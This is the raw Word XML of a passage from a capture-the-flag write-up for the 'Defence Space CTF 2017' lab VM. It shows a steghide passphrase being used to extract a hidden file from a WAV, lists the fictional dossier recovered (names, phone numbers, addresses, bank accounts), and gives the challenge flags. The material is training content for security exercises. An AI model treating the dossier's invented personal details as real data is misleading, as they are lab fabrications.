        <w:t>http://192.168.56.20/Unit990/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I can download two files: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Alfajet106.wav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Sat2.jpg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r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Alfajet106.wav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is hiding a file inside, which I retrieve using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steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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. The passphrase is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bama1987</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47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steghide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info Alfajet106.wav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"Alfajet106.wav":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format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: wave audio, PCM encoding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capacity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: 39.6 KB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Try to get information about embedded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data ?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(y/n) y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Enter passphrase: Bama1987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embedded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file "Topsecret.txt":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: 915.0 Byte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encrypted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: rijndael-128,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cbc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compressed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: yes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steghide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extract -sf Alfajet106.wav -p Bama1987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wrote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extracted data to "Topsecret.txt".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Topsecret.txt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Imam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Abubakar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Shekau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Mobile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091778383990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Email:abubakar.shekau@arimblog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Location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Alfata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street, Behind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A.g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Station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Borno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state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Height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7.0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Age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40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Language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English , Kanuri, Hausa.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Religion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Bank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Account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08878711776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Habibu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Yusuf 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a.k.a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Asalafi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Mobile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091778383910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Email:abubakar.HabibuYusuf1@arimblog.com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Location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Sambisa forest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Borno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state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Height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4.0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Age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25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Language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English , Kanuri, Hausa.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Religion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Bank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Account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08878711777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Khalid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Albarnawai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Mobile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091778383992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Email:abubakar.khalidbaba@arimblog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Location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Maiduguri,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Borno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State, Nigeria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Height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7.0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DOB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1976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Language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English , Kanuri, Hausa.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Religion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Bank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Account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08878711778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Momodu Bama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Mobile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091778383993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Email:bamamomodu@arimblog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Location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Alfata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street, Behind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A.g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Station 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Borno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state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Height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7.0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Language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English , Kanuri, Hausa.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Religion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Bank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Account :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08878711779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>With this, the challenge has been completed.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>This is the list of Flags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RmxhZyAwIChuZXRkaXNjb3Zlcik= - Flag 0 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netdiscover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Flag2 9a8780281d3e37c597cee7ca58bfd435 (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)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Flag3[</w:t>
      </w:r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>19c562a36aeb455d093b4f5236f]+[39 39 30]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flag 4 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admin.php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}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Flag 5 {SQL injection}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>- flag 6 {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nigairforcecloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D47EAF" w:rsidRPr="00D47EAF" w:rsidRDefault="00D47EAF" w:rsidP="00D47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EAF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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7: 3aa652f41d8b4a23e17937149c784868 (widgets)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>This challenge was quite interesting, and it was also interesting to know more about the story behind this VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D47EAF" w:rsidRPr="00D47EAF" w:rsidRDefault="00D47EAF" w:rsidP="00D4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Thank you to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D47E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SilexSecure</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D47E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Team</w:t>
        </w:r>
      </w:hyperlink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for the VM and </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D47E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Vulnhub</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00D47EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for hosting it. For any information or comment, please do not hesitate to leave a comment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32E4" w:rsidRDefault="00D47EAF">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00DB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AF"/>
    <w:rsid w:val="00867464"/>
    <w:rsid w:val="00C323FC"/>
    <w:rsid w:val="00D4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903E-7D2A-4CB3-A6CA-15B1771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egories">
    <w:name w:val="categories"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-date">
    <w:name w:val="post-date"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed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E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7E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A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47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="se">
    <w:name w:val="se"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47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uln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@silexsecure" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/defence-space-ctf-2017,179/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/@silexsec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3899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SLARK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SLARK</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-24T11:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-24T11:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>